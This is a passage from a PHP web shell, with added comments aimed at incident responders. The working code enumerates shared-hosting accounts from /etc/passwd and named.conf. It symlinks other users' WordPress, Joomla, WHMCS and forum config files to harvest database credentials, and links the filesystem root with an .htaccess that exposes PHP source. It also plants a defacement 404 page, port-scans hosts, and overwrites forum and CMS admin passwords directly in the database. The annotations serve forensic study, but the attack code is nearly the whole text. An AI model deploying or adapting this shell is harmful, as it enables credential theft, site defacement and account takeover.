1293 symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1294 symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1295 symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1296 symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1297 symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1298 symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1299 symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1300 symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1301 symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1302 symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1303 symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1304 symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1305 symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1306 symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1307 symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1308 symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1309 symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1310 symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1311 symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1312 symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1313 symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1314 symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb7.txt');
1315 symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1316 symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1317 symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1318 symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1319 symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1320 symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1321 symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1322 symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1323 symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1324 symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1325 symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1326 symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1327 symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1328 symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1329 symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1330 symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1331 symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1332 symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1333 symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1334 symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1335 symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1336 symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1337 symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1338 symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1339 }
 // Driver for syml(). Account names come from one of three sources:
 //   1. passwd-format text supplied in the `passwd` request parameter;
 //   2. zone names parsed out of /etc/named.conf, each mapped to an owner via
 //      the file owner of /etc/valiases/<zone>;
 //   3. posix_getpwuid() for UIDs 0..1000 when named.conf cannot be read.
 // Disk artifacts for responders: a "dhanushSPT" or "dhanushST" directory
 // created relative to the working directory, a transient "test.txt" inside
 // it, and whatever symlinks syml() leaves behind. Each path ends by echoing a
 // link built from $url (request-derived, printed without HTML escaping).
 // None of the mkdir()/chdir()/fopen() results are checked except via "or exit".
1340 if(isset($_REQUEST['passwd']))
1341 {
 // Request data is written to disk verbatim and then re-read line by line.
1342 $getetc = trim($_REQUEST['passwd']);
1343
1344 mkdir("dhanushSPT");
1345 chdir("dhanushSPT");
1346
1347 $myfile = fopen("test.txt","w");
1348 fputs($myfile,$getetc);
1349 fclose($myfile);
1350
1351 $file = fopen("test.txt", "r") or exit("Unable to open file!");
1352 while(!feof($file))
1353 {
1354 $s = fgets($file);
1355 $matches = array();
 // Captures the text between the first "/" on the line and the next ":/",
 // i.e. the home-directory field of a passwd line without its leading slash.
1356 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
 // When the line does not match, $matches[1] is unset and the result is an
 // empty string, which the strlen == 0 test below skips.
1357 $matches = str_replace("home/","",$matches[1]);
 // Skip names longer than 12 bytes, empty names and a fixed list of system
 // directories; everything else is treated as an account name.
1358 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1359 continue;
1360 syml($matches,$matches);
1361 }
1362 fclose($file);
1363 unlink("test.txt");
1364 echo "<center><font class=txt size=3>[ Done ]</font></center>";
1365 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
1366
1367 }
1368 else
1369 {
 // A readable /etc/named.conf selects the zone-based path; the @ hides the
 // warning when the file is missing or unreadable.
1370 $d0mains = @file("/etc/named.conf");
1371 if($d0mains)
1372 {
1373 mkdir("dhanushST");
1374 chdir("dhanushST");
1375
1376 foreach($d0mains as $d0main)
1377 {
 // eregi() was removed in PHP 7.0, so on PHP 7+ this path stops with a
 // fatal error at the first line of named.conf (useful when dating the sample).
1378 if(eregi("zone",$d0main))
1379 {
1380 preg_match_all('#zone "(.*)"#', $d0main, $domains);
1381 flush();
1382
1383 if(strlen(trim($domains[1][0])) > 2)
1384 {
 // Overwrites the script-level $user that the top of the file sets to the
 // login hash. posix_getpwuid() returns false when fileowner() fails.
1385 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1386
1387 syml($user['name'],$domains[1][0]);
1388 }
1389 }
1390 }
1391 echo "<center><font class=txt size=3>[ Done ]</font></center>";
1392 echo "<br><center><a href=".$url."dhanushST target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
1393 }
1394 else
1395 {
 // Fallback: rebuild passwd-style lines by asking posix_getpwuid() for every
 // UID from 0 to 1000, then reuse the same parse loop as the `passwd` path.
1396 mkdir("dhanushSPT");
1397 chdir("dhanushSPT");
1398 $temp = "";
1399 $val1 = 0;
1400 $val2 = 1000;
1401 for(;$val1 <= $val2;$val1++)
1402 {
1403 $uid = @posix_getpwuid($val1);
1404 if ($uid)
1405 $temp .= join(':',$uid)."\n";
1406 }
1407 echo '<br/>';
1408 $temp = trim($temp);
1409
1410 $file5 = fopen("test.txt","w");
1411 fputs($file5,$temp);
1412 fclose($file5);
1413
1414
1415 $file = fopen("test.txt", "r") or exit("Unable to open file!");
1416 while(!feof($file))
1417 {
1418 $s = fgets($file);
1419 $matches = array();
1420 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1421 $matches = str_replace("home/","",$matches[1]);
1422 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1423 continue;
1424 syml($matches,$matches);
1425 }
1426 fclose($file);
 // Closes a table that this branch never opened.
1427 echo "</table>";
1428 unlink("test.txt");
1429 echo "<center><font class=txt size=3>[ Done ]</font></center>";
1430 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
1431 }
1432 }
1433 }
1434 else
1435 echo "<center>Cannot Complete the task!!!!</center>";
1436
1437}
// Input form for the single-file symlink feature. When `symlinkfile` is present
// and no `file` parameter is set, it renders a text box pre-filled with
// /etc/passwd; submitting calls the client-side getdata('symlinkmyfile', ...)
// helper. With a `file` parameter present the branch outputs nothing.
1438else if(isset($_GET["symlinkfile"]))
1439{
1440 if(!isset($_GET['file']))
1441 {
1442 ?>
1443 <center>
1444 <form onSubmit="getdata('symlinkmyfile',file.value);return false;">
1445 <input type="text" class="box" name="file" size="50" value="/etc/passwd">
1446 <input type="button" value="Create Symlink" onClick="getdata('symlinkmyfile',file.value)" class="but">
1447 </form></center>
1448 <br><br>
1449 <?php
1450 }
1451}
1452
// Single-file symlink handler (Linux only): takes a path from the `myfile`
// query parameter and tries to leave a link named "symlink<N>" to it in the
// working directory, going through a scratch directory tree it builds first.
// NOTE(review): the create-link-then-replace-with-directory sequence looks
// like the long-published symlink trick against PHP path restrictions;
// confirm against the PHP version of the affected host.
// Disk artifacts for responders: a chain of nested "cx" directories ($fakedep
// levels), directories mirroring the components of the requested path, a
// "fakesymlink" directory, and one or more "symlink<N>" links.
// Hardening points: listing symlink in PHP's disable_functions, a web server
// that only follows owner-matching links, and a non-writable document root.
1453else if(isset($_GET['symlinkmyfile']))
1454{
1455 if(stristr(php_uname(),"Linux"))
1456 {
1457 $fakedir="cx";
1458 $fakedep=16;
1459
1460 $num=0; // offset of symlink.$num
1461
 // The path comes straight from the query string; nothing validates it.
1462 if(!empty($_GET['myfile']))
1463 $file=$_GET['myfile'];
1464 else $file="";
1465
1466 if(empty($file))
1467 exit;
1468
 // Only reports the problem; execution continues regardless.
1469 if(!is_writable("."))
1470 echo "not writable directory";
1471
 // NOTE(review): $level is never read in this branch.
1472 $level=0;
1473
 // Build the nested scratch directories, descending as they are created.
1474 for($as=0;$as<$fakedep;$as++)
1475 {
1476 if(!file_exists($fakedir))
1477 mkdir($fakedir);
1478 chdir($fakedir);
1479 }
1480
1481 while(1<$as--) chdir("..");
1482
 // Recreate each non-empty component of the requested path as a directory.
1483 $hardstyle = explode("/", $file);
1484
1485 for($a=0;$a<count($hardstyle);$a++)
1486 {
1487 if(!empty($hardstyle[$a]))
1488 {
1489 if(!file_exists($hardstyle[$a]))
1490 mkdir($hardstyle[$a]);
1491 chdir($hardstyle[$a]);
1492 $as++;
1493 }
1494 }
1495 $as++;
1496 while($as--)
1497 chdir("..");
1498
1499 @rmdir("fakesymlink");
1500 @unlink("fakesymlink");
1501
1502 @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
1503
 // No upper bound: if symlink() never returns true (for example because the
 // function is disabled) this loop spins until the process is killed; the
 // top of the file also calls set_time_limit(0).
1504 while(1)
1505 if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
1506 else $num++;
1507
1508 @unlink("fakesymlink");
1509 mkdir("fakesymlink");
1510
1511 echo '<CENTER>check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</CENTER>';
1512 }
1513 else
1514 echo '<CENTER>Cannot Create Symlink</CENTER>';
1515}
// Input form for the custom 404 page: a textarea named `message` with a
// default defacement string; the button calls the client-side my404page()
// helper. Nothing is written to disk by this branch itself.
1516else if(isset($_REQUEST['404new']))
1517{
1518 ?>
1519 <form>
1520 <center><textarea name=message cols=100 rows=18 class=box>lol! You just got hacked</textarea></br>
1521 <input type="button" onClick="my404page(message.value)" value=" Save " class=but></center>
1522 </br>
1523 </form>
1524 <?php
1525}
// Replaces the site's 404 page: appends an ErrorDocument directive to the
// .htaccess in the working directory and writes 404.html next to it. The page
// body is the POSTed `message` if present, otherwise the base64-decoded $ind
// defined at the top of the file.
// Responder notes: look for an unexpected "ErrorDocument 404 ...404.html" line
// in .htaccess (opened in append mode, so earlier content is kept) and for a
// new or modified 404.html; the directive is terminated with "\n\r" (LF then
// CR), which is an unusual byte sequence worth searching for. File-integrity
// monitoring on .htaccess and a document root the PHP user cannot write to
// are the relevant controls.
1526else if(isset($_REQUEST['404page']))
1527{
 // Directory part of the request URI: the last "/"-separated segment is
 // removed with str_replace(), which removes every occurrence of that text.
1528 $url = $_SERVER['REQUEST_URI'];
1529 $path=explode('/',$url);
1530 $url =str_replace($path[count($path)-1],'',$url);
1531 if(isset($_POST['message']))
1532 {
1533 if($myfile = fopen(".htaccess", "a"))
1534 {
1535 fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
 // Request body is written to 404.html unmodified. Neither handle is closed
 // in this path, and the success message below is printed even when
 // 404.html could not be opened.
1536 if($myfilee = fopen("404.html", "w+"))
1537 {
1538 fwrite($myfilee, $_POST['message']);
1539 }
1540 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
1541 }
1542 else
1543 echo "<center>Cannot Set 404 Page</center>";
1544 }
1545 else if(strlen($ind) != 0)
1546 {
1547 if($myfile = fopen(".htaccess", "a"))
1548 {
1549 fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
1550
1551 if($myfilee = fopen("404.html", "w+"))
1552 {
 // Built-in defacement text shipped with the shell.
1553 fwrite($myfilee, base64_decode($ind));
1554
1555 fclose($myfilee);
1556 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
1557 }
1558 fclose($myfile);
1559 }
1560 else
1561 {
1562 echo "<center>Cannot Set 404 Page</center>";
1563 }
1564 }
1565 else
1566 echo "<center>Nothing Specified in the shell</center>";
1567}
// Reverse-IP lookup view: emits an iframe pointing at sameip.org with the
// server's SERVER_ADDR in the URL, so the address is disclosed to that third
// party by the viewer's browser over plain HTTP. The lookup happens
// client-side; the compromised host itself makes no outbound request here.
1568else if(isset($_GET["domains"]))
1569{
1570 ?><center><iframe src="<?php echo 'http://sameip.org/ip/' . getenv('SERVER_ADDR'); ?>" width="80%" height="1000px"></iframe></center><?php
1571}
1572else if(isset($_GET["symlink"]))
1573{
1574 $d0mains = @file("/etc/named.conf");
1575 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
1576 $path=explode('/',$url);
1577 $url =str_replace($path[count($path)-1],'',$url);
1578 if($d0mains)
1579 {
1580 @mkdir("dhanush",0777);
1581 @chdir("dhanush");
1582 execmd("ln -s / root");
1583 $file3 = 'Options all
1584 DirectoryIndex Sux.html
1585 AddType text/plain .php
1586 AddHandler server-parsed .php
1587 AddType text/plain .html
1588 AddHandler txt .html
1589 Require None
1590 Satisfy Any
1591 ';
1592 $fp3 = fopen('.htaccess','w');
1593 $fw3 = fwrite($fp3,$file3);
1594 @fclose($fp3);
1595 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr align =center><td align=center><font size=3 >S. No.</font></td><td align=center><font size=3 >Domains</font></td><td align=center><font size=3 >Users</font></td><td align=center><font size=3 >Symlink</font></td><td align=center><font size=3 >Information</font></td></tr>";
1596
1597 $dcount = 1;
1598 foreach($d0mains as $d0main)
1599 {
1600 if(eregi("zone",$d0main))
1601 {
1602 preg_match_all('#zone "(.*)"#', $d0main, $domains);
1603 flush();
1604
1605 if(strlen(trim($domains[1][0])) > 2)
1606 {
1607 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1608
1609 echo "<tr align=center><td><font class=txt>" . $dcount . "</font></td><td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td><td><font class=txt>".$user['name']."</font></td><td><a href=".$url."dhanush/root/home/".$user['name']."/public_html target='_blank'><font class=txt>Symlink</font></a></td><td><font class=txt><a href=?info=".$domains[1][0]." target=_blank>info</a></font></td></tr>"; flush();
1610 $dcount++;
1611 }
1612 }
1613
1614 }
1615 echo "</table>";
1616 }
1617 else
1618 {
// Shared-hosting account enumeration, Linux only (the enclosing branch header
// is outside this excerpt). The visible code creates a world-writable
// directory "dhanush" beside the shell, asks execmd() (defined elsewhere in
// the file) to create a symlink "root" -> "/", and writes an .htaccess that
// sets "Options all" and maps .php/.html to text/plain - presumably so files
// reached through the symlink are served as source instead of being executed.
// It then lists account names and prints one link per account into that tree.
// Artifacts for responders: the "dhanush" directory, the "root" symlink to "/",
// the .htaccess below, and a short-lived "test.txt" in the same directory.
// Hardening to verify: SymLinksIfOwnerMatch rather than FollowSymLinks,
// AllowOverride that does not grant Options/FileInfo, and open_basedir.
1619 if(stristr(php_uname(),"Linux"))
1620 {
1621 ?>
1622 <div style="float:left;position:fixed;">
1623 <form>
1624 <table cellpadding="9">
1625 <tr>
1626 <th colspan="2">Get User Name</th>
1627 </tr>
1628 <tr>
1629 <td>Enter Website Name :</td>
1630 <td><input type="text" name="sitename" value="sitename.com" class="sbox"></td>
1631 </tr>
1632 <tr>
1633 <td align="center" colspan="2"><input type="button" onClick="getname(sitename.value)" value=" Get IT " class="but"></td>
1634 </tr>
1635 <tr>
1636 <td colspan=2 align=center><div style="width:250px;" id="showsite"></div></td>
1637 </tr>
1638 </table>
1639 </form>
1640 </div>
1641 <?php
// Probe whether this PHP process can read /etc/passwd directly; errors are
// suppressed with @, so a failure simply selects the fallback branch below.
1642 $TEST=@file('/etc/passwd');
1643 if ($TEST)
1644 {
1645 @mkdir("dhanush",0777);
1646 @chdir("dhanush");
1647 execmd("ln -s / root");
1648 $file3 = 'Options all
1649 DirectoryIndex Sux.html
1650 AddType text/plain .php
1651 AddHandler server-parsed .php
1652 AddType text/plain .html
1653 AddHandler txt .html
1654 Require None
1655 Satisfy Any
1656 ';
1657 $fp3 = fopen('.htaccess','w');
1658 $fw3 = fwrite($fp3,$file3);
1659 @fclose($fp3);
1660
1661 echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
1662
1663 $dcount = 1;
1664 $file = fopen("/etc/passwd", "r");
1665 //Output a line of the file until the end is reached
// Per line: capture the text between the first "/" and the next ":/" (on a
// passwd record that is the home-directory field), strip "home/", and skip
// empty results, results longer than 12 characters and the listed system paths.
1666 while(!feof($file))
1667 {
1668 $s = fgets($file);
1669 $matches = array();
1670 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1671 $matches = str_replace("home/","",$matches[1]);
1672 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1673 continue;
1674 echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
// $url is not set in this excerpt; presumably the shell's base URL - confirm
// against the earlier part of the file.
1675 echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1676 $dcount++;
1677 }
1678 fclose($file);
1679
1680 echo "</table>";
1681 }
1682 else
1683 {
// Fallback when /etc/passwd is unreadable: same directory, symlink and
// .htaccess setup, then uids 0..1000 are resolved with posix_getpwuid(),
// written to test.txt, parsed with the same regex, and test.txt is deleted.
1684 @mkdir("dhanush",0777);
1685 @chdir("dhanush");
1686 execmd("ln -s / root");
1687 $file3 = 'Options all
1688 DirectoryIndex Sux.html
1689 AddType text/plain .php
1690 AddHandler server-parsed .php
1691 AddType text/plain .html
1692 AddHandler txt .html
1693 Require None
1694 Satisfy Any
1695 ';
1696 $fp3 = fopen('.htaccess','w');
1697 $fw3 = fwrite($fp3,$file3);
1698 @fclose($fp3);
1699
1700 echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
1701
1702 $temp = "";
1703 $val1 = 0;
1704 $val2 = 1000;
1705 for(;$val1 <= $val2;$val1++)
1706 {
1707 $uid = @posix_getpwuid($val1);
1708 if ($uid)
1709 $temp .= join(':',$uid)."\n";
1710 }
1711 echo '<br/>';
1712 $temp = trim($temp);
1713
1714 $file5 = fopen("test.txt","w");
1715 fputs($file5,$temp);
1716 fclose($file5);
1717
1718 $dcount = 1;
1719 $file = fopen("test.txt", "r");
1720 while(!feof($file))
1721 {
1722 $s = fgets($file);
1723 $matches = array();
1724 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1725 $matches = str_replace("home/","",$matches[1]);
1726 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1727 continue;
1728 echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
1729 echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1730 $dcount++;
1731 }
1732 fclose($file);
1733 echo "</table>";
1734 unlink("test.txt");
1735 }
1736 }
1737 else
1738 echo "<center><font size=4 >Cannot create Symlink</font></center>";
1739 }
1740}
// Outbound connection probe: for a caller-supplied "host", tries a fixed list
// of 24 ports with fsockopen() (1 second timeout each) and prints the ports
// that accepted a connection. "protocol" is only passed to getservbyport(),
// whose result ($service) is never used. The connections originate from the
// web server itself, so internal hosts it can reach are in scope.
// Detection: a burst of short-lived outbound connects from the PHP/web-server
// process to this port list; requests carrying both "host" and "protocol".
// Mitigation: egress filtering for the web tier.
1741else if(isset($_GET['host']) && isset($_GET['protocol']))
1742{
1743 echo "Open Ports: ";
1744 $host = $_GET['host'];
1745 $proto = $_GET['protocol'];
1746 $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
1747 for($current = 0; $current <= 23; $current++)
1748 {
1749 $currents = $myports[$current];
1750 $service = getservbyport($currents, $proto);
1751 // Try to connect to port
1752 $result = fsockopen($host, $currents, $errno, $errstr, 1);
1753 // Show results
1754 if($result)
1755 echo "<font class=txt>$currents, </font>";
1756 }
1757}
// Account takeover via direct database writes. The operator supplies database
// host, name, user and password (f1..f4), a table prefix and a target user id;
// each sub-branch overwrites the password column of one forum/CMS user table
// with a hash computed here. Request values are interpolated into the SQL
// text unchanged.
// Indicators for responders:
//  - most values are read from $_GET, so database credentials and the new
//    password may be recoverable from access logs that record query strings;
//  - the salts are hard-coded ("eghjghrtd", "jeghj", "eghj"), so user rows
//    whose salt column equals one of these constants were rewritten by this
//    code;
//  - the Joomla sub-branch also renames the account and matches on the
//    display name rather than an id.
// Response: treat the database credentials as disclosed and rotate them,
// compare user tables against backups, force password resets.
1758else if(isset($_REQUEST['forumpass']))
1759{
1760 $localhost = $_GET['f1'];
1761 $database = $_GET['f2'];
1762 $username = $_GET['f3'];
1763 $password = $_GET['f4'];
1764 $prefix = $_GET['prefix'];
1765 $newpass = $_GET['newpass'];
1766 $uid = $_GET['uid'];
1767
1768 if($_GET['forums'] == "vb")
1769 {
1770 $newpass = $_GET['newipbpass'];
1771 $uid = $_GET['ipbuid'];
1772 $con = mysql_connect($localhost,$username,$password);
1773 $db = mysql_select_db($database,$con);
1774 $salt = "eghjghrtd";
1775 $newpassword = md5(md5($newpass) . $salt);
1776 if($prefix == "" || $prefix == null)
1777 $sql = mysql_query("update user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
1778 else
1779 $sql = mysql_query("update ".$prefix."user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
1780 if($sql)
1781 {
1782 mysql_close($con);
1783 echo "<font class=txt>Password Changed Successfully</font>";
1784 }
1785 else
1786 echo "Cannot Change Password";
1787 }
1788 else if($_GET['forums'] == "mybb")
1789 {
1790 $newpass = $_GET['newipbpass'];
1791 $uid = $_GET['ipbuid'];
1792 $con = mysql_connect($localhost,$username,$password);
1793 $db = mysql_select_db($database,$con);
1794 $salt = "jeghj";
1795 $newpassword = md5(md5($salt).md5($newpass));
1796 if($prefix == "" || $prefix == null)
1797 $sql = mysql_query("update mybb_users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
1798 else
1799 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
1800 if($sql)
1801 {
1802 mysql_close($con);
1803 echo "<font class=txt>Password Changed Successfully</font>";
1804 }
1805 else
1806 echo "Cannot Change Password";
1807 }
1808 else if($_GET['forums'] == "smf")
1809 {
1810 $newpass = $_GET['newipbpass'];
1811 $uid = $_GET['ipbuid'];
1812 $con = mysql_connect($localhost,$username,$password);
1813 $db = mysql_select_db($database,$con);
1814
// SMF: the stored value is sha1(lowercased member name . new password), so the
// member name is read back from the table first.
1815 if($prefix == "" || $prefix == null)
1816 {
1817 $result = mysql_query("select member_name from smf_members where id_member = $uid");
1818 $row = mysql_fetch_array($result);
1819 $membername = $row['member_name'];
1820 $newpassword = sha1(strtolower($membername).$newpass);
1821 $sql = mysql_query("update smf_members set passwd = '$newpassword' where id_member = '$uid'");
1822 }
1823 else
1824
1825 {
1826 $result = mysql_query("select member_name from ".$prefix."members where id_member = $uid");
1827 $row = mysql_fetch_array($result);
1828 $membername = $row['member_name'];
1829 $newpassword = sha1(strtolower($membername).$newpass);
1830 $sql = mysql_query("update ".$prefix."members set passwd = '$newpassword' where id_member = '$uid'");
1831 }
1832 if($sql)
1833 {
1834 mysql_close($con);
1835 echo "<font class=txt>Password Changed Successfully</font>";
1836 }
1837 else
1838 echo "Cannot Change Password";
1839 }
1840 else if($_GET['forums'] == "phpbb")
1841 {
// This sub-branch and the "ipb" one read the new password and user id from
// $_POST, unlike the others, which read $_GET.
1842 $newpass = $_POST['newipbpass'];
1843 $uid = $_POST['ipbuid'];
1844 $con = mysql_connect($localhost,$username,$password);
1845 $db = mysql_select_db($database,$con);
1846
1847 $newpassword = md5($newpass);
1848 if(empty($prefix) || $prefix == null)
1849 $sql = mysql_query("update phpb_users set user_password = '$newpassword' where user_id = '$uid'");
1850 else
1851 $sql = mysql_query("update ".$prefix."users set user_password = '$newpassword' where user_id = '$uid'");
1852 if($sql)
1853 {
1854 mysql_close($con);
1855 echo "<font class=txt>Password Changed Successfully</font>";
1856 }
1857 else
1858 echo "Cannot Change Password";
1859 }
1860 else if($_GET['forums'] == "ipb")
1861 {
1862 $newpass = $_POST['newipbpass'];
1863 $uid = $_POST['ipbuid'];
1864 $con = mysql_connect($localhost,$username,$password);
1865 $db = mysql_select_db($database,$con);
1866 $salt = "eghj";
1867 $newpassword = md5(md5($salt).md5($newpass));
1868 if($prefix == "" || $prefix == null)
1869 $sql = mysql_query("update members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
1870 else
1871 $sql = mysql_query("update ".$prefix."members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
1872 if($sql)
1873 {
1874 mysql_close($con);
1875 echo "<font class=txt>Password Changed Successfully</font>";
1876 }
1877 else
1878 echo "Cannot Change Password";
1879 }
1880 else if($_GET['forums'] == "wp")
1881 {
// WordPress: besides the password, user_login is replaced with the supplied
// "uname", so an unexpected login-name change on the targeted ID is a further
// indicator.
1882 $uname = $_GET['uname'];
1883 $con = mysql_connect($localhost,$username,$password);
1884 $db = mysql_select_db($database,$con);
1885
1886 $newpassword = md5($newpass);
1887 if($prefix == "" || $prefix == null)
1888 $sql = mysql_query("update wp_users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
1889 else
1890 $sql = mysql_query("update ".$prefix."users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
1891 if($sql)
1892 {
1893 mysql_close($con);
1894 echo "<font class=txt>Password Changed Successfully</font>";
1895 }
1896 else
1897 echo "Cannot Change Password";
1898 }
1899 else if($_GET['forums'] == "joomla")
1900 {
// Joomla: rows are selected by display name ('Super User', and with a prefix
// also 'Administrator'); both username and password are replaced.
1901 $newjoomlapass = $_GET['newjoomlapass'];
1902 $joomlauname = $_GET['username'];
1903 $con = mysql_connect($localhost,$username,$password);
1904 $db = mysql_select_db($database,$con);
1905
1906 $newpassword = md5($newjoomlapass);
1907 if($prefix == "" || $prefix == null)
1908 $sql = mysql_query("update jos_users set password = '$newpassword', username = '$joomlauname' where name = 'Super User'");
1909 else
1910 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', username = '$joomlauname' where name = 'Super User' OR name = 'Administrator'");
1911 if($sql)
1912 {
1913 mysql_close($con);
